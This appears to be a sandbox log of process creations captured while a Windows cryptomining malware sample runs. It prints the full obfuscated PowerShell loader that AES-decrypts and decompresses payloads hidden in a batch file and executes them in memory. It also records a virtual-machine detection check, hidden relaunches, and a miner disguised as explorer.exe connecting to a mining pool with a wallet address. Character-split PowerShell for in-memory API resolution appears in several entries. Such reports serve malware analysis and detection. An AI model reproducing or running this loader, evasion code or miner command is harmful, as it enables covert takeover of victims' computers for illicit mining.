        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 'c:\users\user\appdata\local\temp\b.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:fululhvbhhgj{param([outputtype([type])][parameter(position=0)][type[]]$nnulhbqztprdhv,[parameter(position=1)][type]$ofcpxnfkpy)$qvwxxlmoanu=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[char](116)+''+[char](101)+''+[char](100)+''+[char](68)+''+'e'+'l'+[char](101)+''+[char](103)+''+'a'+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+'me'+[char](109)+'o'+[char](114)+''+[char](121)+''+[char](77)+'odul'+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+''+'e'+''+[char](108)+'e'+[char](103)+'a'+[char](116)+''+'e'+'t'+[char](121)+''+[char](112)+''+'e'+'','c'+[char](108)+''+'a'+'ss'+[char](44)+''+'p'+''+[char](117)+'b'+[char](108)+''+[char](105)+''+[char](99)+''+[char](44)+''+'s'+''+[char](101)+''+[char](97)+''+'l'+'e'+[char](100)+''+[char](44)+''+[char](65)+''+[char](110)+'s'+[char](105)+''+[char](67)+'l'+'a'+'s'+[char](115)+','+[char](65)+''+[char](117)+''+[char](116)+'oc'+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$qvwxxlmoanu.defineconstructor(''+[char](82)+''+[char](84)+'s'+[char](112)+''+[char](101)+''+'c'+''+'i'+''+[char](97)+''+[char](108)+'n'+[char](97)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+''+[char](101)+'by'+[char](83)+''+'i'+''+[char](103)+''+[char](44)+'pu'+'b'+''+'l'+'i'+'c'+'',[reflection.callingconventions]::standard,$nnulhbqztprdhv).setimplementationflags(''+'r'+''+[char](117)+''+[char](110)+'t'+'i'+''+[char](109)+''+[char](101)+',ma'+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$qvwxxlmoanu.definemethod(''+'i'+''+'n'+''+[char](118)+''+[char](111)+''+[char](107)+''+[char](101)+'','p'+'u'+''+[char](98)+'l'+[char](105)+'c'+','+''+[char](72)+''+[char](105)+'de'+'b'+''+'y'+''+'s'+'i'+[char](103)+','+[char](78)+''+'e'+''+'w'+''+'s'+''+[char](108)+'ot'+[char](44)+''+'v'+''+'i'+''+'r'+'t'+[char](117)+''+'a'+'l',$ofcpxnfkpy,$nnulhbqztprdhv).setimplementationflags(''+'r'+''+'u'+''+[char](110)+''+'t'+''+[char](105)+'m'+[char](101)+''+','+'m'+'a'+'n'+[char](97)+'g'+[char](101)+''+'d'+'');write-output $qvwxxlmoanu.createtype();}$iknksxdttnkac=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+''+'t'+''+[char](101)+''+'m'+''+[char](46)+''+[char](100)+'l'+[char](108)+'')}).gettype(''+'m'+'ic'+[char](114)+''+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+''+'t'+''+[char](46)+''+[char](87)+''+[char](105)+''+[char](110)+''+'3'+''+[char](50)+''+'.'+'u'+'n'+''+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+''+'n'+''+[char](97)+''+'t'+''+[char](105)+''+'v'+''+[char](101)+''+[char](77)+''+[char](101)+''+[char](116)+''+'h'+''+[char](111)+''+[char](10
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:kvehnqwssgcg{param([outputtype([type])][parameter(position=0)][type[]]$mhkvivexzpriho,[parameter(position=1)][type]$qoutaubbtf)$msesbhasmah=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+'e'+'f'+[char](108)+''+'e'+''+'c'+'te'+'d'+'d'+[char](101)+'le'+'g'+''+[char](97)+''+[char](116)+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+[char](77)+''+[char](101)+''+'m'+''+[char](111)+'ry'+[char](77)+''+[char](111)+'dul'+'e'+'',$false).definetype(''+[char](77)+'y'+[char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[char](97)+''+'t'+''+'e'+'t'+[char](121)+''+[char](112)+''+[char](101)+'',''+'c'+''+'l'+''+[char](97)+''+'s'+'s'+','+''+[char](80)+''+[char](117)+''+[char](98)+'l'+[char](105)+'c'+[char](44)+''+[char](83)+''+[char](101)+'a'+[char](108)+'e'+[char](100)+''+[char](44)+''+[char](65)+''+[char](110)+''+[char](115)+''+[char](105)+'c'+[char](108)+''+[char](97)+''+[char](115)+'s,'+[char](65)+'u'+[char](116)+'o'+'c'+'la'+[char](115)+''+[char](115)+'',[multicastdelegate]);$msesbhasmah.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+[char](112)+''+'e'+'c'+'i'+''+[char](97)+''+[char](108)+''+[char](78)+'ame'+[char](44)+''+[char](72)+''+'i'+'d'+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+'li'+[char](99)+'',[reflection.callingconventions]::standard,$mhkvivexzpriho).setimplementationflags(''+'r'+''+[char](117)+''+'n'+''+'t'+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+[char](110)+''+[char](97)+''+[char](103)+'e'+[char](100)+'');$msesbhasmah.definemethod(''+[char](73)+'nv'+'o'+'k'+'e'+'',''+[char](80)+''+'u'+''+'b'+''+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+'i'+'d'+'eb'+'y'+'s'+'i'+'g'+','+''+[char](78)+''+'e'+'w'+[char](83)+''+'l'+''+[char](111)+''+'t'+''+','+''+'v'+''+'i'+''+[char](114)+''+'t'+''+[char](117)+''+'a'+'l',$qoutaubbtf,$mhkvivexzpriho).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+'t'+[char](105)+'m'+[char](101)+''+','+''+[char](77)+'ana'+[char](103)+''+[char](101)+'d');write-output $msesbhasmah.createtype();}$gffwslpcsixef=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+'y'+'s'+[char](116)+'e'+[char](109)+''+'.'+''+'d'+''+[char](108)+''+'l'+'')}).gettype(''+[char](77)+''+'i'+''+'c'+''+[char](114)+'o'+[char](115)+'o'+[char](102)+''+[char](116)+''+'.'+''+'w'+'i'+'n'+'32.'+[char](85)+'n'+[char](115)+''+[char](97)+''+'f'+''+[char](101)+'na'+[char](116)+'i'+[char](118)+''+[char](101)+''+[char](77)+''+'e'+''+[char](116)+''+'h'+''+[char](111)+''+[char](100)+'s');$xrdavnignzllon=$gffwslpcsixef.getmethod(''+'g'+''+'e'+''+[char](116)+''+[char](80)+''+'r'+'o'+[char](99)+''+'a'+''+[cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:yrwhxohynmxl{param([outputtype([type])][parameter(position=0)][type[]]$mjbpafoyxdmllp,[parameter(position=1)][type]$mbxclwmzji)$qsxeicuzieu=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+[char](101)+''+[char](102)+''+[char](108)+''+[char](101)+''+[char](99)+''+[char](116)+'e'+[char](100)+''+[char](68)+'e'+[char](108)+'eg'+'a'+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+'m'+'e'+'m'+'o'+[char](114)+''+'y'+''+[char](77)+'o'+'d'+''+[char](117)+''+'l'+''+[char](101)+'',$false).definetype(''+[char](77)+''+'y'+'d'+'e'+''+'l'+'e'+[char](103)+'a'+[char](116)+'e'+[char](84)+''+'y'+''+'p'+'e',''+[char](67)+''+'l'+'a'+'s'+''+[char](115)+''+[char](44)+'p'+[char](117)+''+'b'+''+'l'+'ic'+[char](44)+''+[char](83)+''+[char](101)+''+[char](97)+'le'+'d'+','+[char](65)+''+'n'+'sic'+'l'+'a'+'s'+''+[char](115)+''+[char](44)+''+'a'+'ut'+[char](111)+''+'c'+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$qsxeicuzieu.defineconstructor(''+[char](82)+''+[char](84)+'sp'+[char](101)+''+[char](99)+''+'i'+'a'+[char](108)+''+[char](78)+''+[char](97)+''+[char](109)+'e,h'+'i'+''+'d'+'e'+'b'+''+'y'+'s'+[char](105)+''+'g'+''+[char](44)+''+[char](80)+'ub'+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$mjbpafoyxdmllp).setimplementationflags(''+[char](82)+''+[char](117)+'nt'+'i'+''+'m'+''+'e'+''+[char](44)+''+'m'+'a'+[char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsxeicuzieu.definemethod('i'+[char](110)+'v'+'o'+''+[char](107)+''+'e'+'','p'+[char](117)+''+[char](98)+''+[char](108)+'i'+'c'+''+','+''+'h'+'i'+'d'+''+'e'+'b'+[char](121)+''+[char](83)+'i'+'g'+''+','+''+'n'+''+[char](101)+''+'w'+'s'+[char](108)+''+[char](111)+''+[char](116)+','+'v'+''+[char](105)+''+'r'+'t'+[char](117)+'a'+[char](108)+'',$mbxclwmzji,$mjbpafoyxdmllp).setimplementationflags(''+[char](82)+''+'u'+''+'n'+''+[char](116)+''+'i'+''+'m'+''+[char](101)+''+[char](44)+''+[char](77)+'a'+[char](110)+''+[char](97)+''+'g'+''+[char](101)+''+'d'+'');write-output $qsxeicuzieu.createtype();}$xabpoaxizgegr=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+''+[char](115)+''+[char](116)+''+[char](101)+''+[char](109)+''+[char](46)+''+[char](100)+''+[char](108)+'l')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+[char](114)+''+'o'+''+'s'+'o'+[char](102)+''+[char](116)+''+'.'+''+'w'+''+[char](105)+'n32'+[char](46)+'uns'+'a'+''+[char](102)+''+[char](101)+''+[char](78)+''+[char](97)+''+[char](116)+''+[char](105)+''+'v'+''+[char](101)+'m'+[char](101)+''+[char](116)+'h'+[char](111)+'d'+[char](115)+'');$onnlowkafauoge=$xabpoaxizgegr.getmethod(''+'g'+''+[char](101)+''+[char](116)+''+'p'+'r'+[char](111)+''+[char](99)+'a'+[char](100)+''+'d'+''+[cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:nyguwfckeoje{param([outputtype([type])][parameter(position=0)][type[]]$kiydauqzmkkpvq,[parameter(position=1)][type]$ozrvwwezvx)$jczrwmspqgk=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+'f'+[char](108)+''+[char](101)+''+'c'+'t'+[char](101)+''+[char](100)+''+'d'+'e'+'l'+''+[char](101)+''+'g'+''+[char](97)+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('in'+[char](77)+'e'+[char](109)+''+[char](111)+'ry'+[char](77)+''+'o'+''+'d'+'u'+[char](108)+''+'e'+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+''+'e'+''+[char](108)+''+[char](101)+''+[char](103)+'a'+[char](116)+''+[char](101)+''+[char](84)+'yp'+'e'+'',''+'c'+''+'l'+''+'a'+''+'s'+'s,p'+[char](117)+''+[char](98)+''+[char](108)+''+'i'+'c'+','+''+[char](83)+''+[char](101)+''+'a'+'le'+'d'+''+[char](44)+''+'a'+''+[char](110)+''+[char](115)+''+[char](105)+''+'c'+''+[char](108)+''+'a'+''+[char](115)+'s'+[char](44)+''+[char](65)+'u'+'t'+'o'+[char](67)+''+'l'+''+'a'+'ss',[multicastdelegate]);$jczrwmspqgk.defineconstructor('rt'+[char](83)+''+[char](112)+''+[char](101)+''+[char](99)+''+[char](105)+'a'+'l'+''+[char](78)+''+[char](97)+''+[char](109)+''+'e'+','+'h'+'i'+[char](100)+'e'+[char](66)+''+[char](121)+''+[char](83)+'ig'+[char](44)+''+'p'+''+[char](117)+'b'+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$kiydauqzmkkpvq).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+'ime,'+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$jczrwmspqgk.definemethod('i'+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+[char](101)+'',''+[char](80)+''+[char](117)+''+'b'+''+'l'+''+[char](105)+''+[char](99)+','+[char](72)+''+'i'+''+[char](100)+''+'e'+'b'+'y'+''+[char](83)+''+[char](105)+''+[char](103)+','+'n'+''+[char](101)+'w'+[char](83)+''+'l'+''+[char](111)+''+[char](116)+''+','+'v'+[char](105)+'rt'+[char](117)+''+[char](97)+''+[char](108)+'',$ozrvwwezvx,$kiydauqzmkkpvq).setimplementationflags('r'+'u'+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+'m'+''+[char](97)+''+[char](110)+''+'a'+'ge'+'d'+'');write-output 